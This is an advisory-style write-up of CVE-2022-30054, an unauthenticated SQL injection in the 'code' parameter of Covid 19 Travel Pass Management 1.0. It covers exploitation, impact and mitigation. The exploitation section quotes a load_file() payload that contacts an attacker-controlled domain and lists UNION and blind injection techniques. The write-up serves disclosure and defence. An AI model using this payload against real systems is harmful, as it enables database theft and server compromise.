CVE-2022-30054

Vulnerability

Covid 19 Travel Pass Management 1.0 contains a SQL injection vulnerability in the code parameter, as described in [1]. The application uses the code parameter in a GET request to the view_pass.php page. The parameter is directly concatenated into SQL queries without sanitization, allowing an attacker to inject arbitrary SQL statements. The vendor has not released a fix, and the version is end-of-life or unsupported. Affected application: Covid 19 Travel Pass Management version 1.0 [1].

Exploitation

An unauthenticated attacker can exploit the vulnerability by sending a crafted GET request to the vulnerable endpoint page=view_pass&code=... [1]. The attacker does not need any prior authentication. The reference demonstrates multiple payloads for boolean-based blind, error-based, time-based blind, and UNION query injection [1]. One specific payload uses load_file() to read files from the database server, such as '+(select load_file('\\\\attacker-controlled-domain\\path'))+' [1]. The application interacted with an external domain, confirming the SQL injection was successfully executed [1].

Impact

Successful exploitation enables the attacker to extract sensitive data from the database, including administrator credentials and information about all accounts on the system [1]. The attacker can use the load_file function to read arbitrary files from the database server's filesystem, potentially leading to complete compromise of the application and underlying server [1]. The attacker may also perform UNION-based queries to dump the database contents, as the payload uses 10 columns in the UNION query [1].

Mitigation

No official patch or fix is available from the vendor for this version [1]. Users should immediately upgrade to a patched version if available; otherwise, they must apply input validation and parameterized queries to the code parameter as a workaround [1]. The application appears to be end-of-life, so migration to a supported alternative is recommended [1]. There is no indication that this CVE is listed in the CISA Known Exploited Vulnerabilities (KEV) catalog.